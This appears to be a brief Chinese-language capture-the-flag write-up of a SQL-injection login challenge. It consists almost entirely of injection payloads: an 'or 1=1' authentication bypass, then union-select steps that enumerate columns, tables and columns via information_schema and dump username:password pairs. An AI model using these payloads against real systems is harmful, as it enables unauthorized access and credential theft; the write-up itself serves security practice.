使用万能密码试一下
用户名为 1' or 1=1;# 密码随意
username=admin&password=6ec1cab790051296b99514856f25f48b' order by 3 # //不报错
username=admin&password=6ec1cab790051296b99514856f25f48b' order by 4 # //报错
总共有三列
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,3 #
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,database() #
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='geekuser' #
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(username,0x3a,password) from geekuser #
结果不是我们想要的
username=admin&password=-6ec1cab790051296b99514856f25f48b' union select 1,2,group_concat(username,0x3a,password) from l0ve1ysq1 #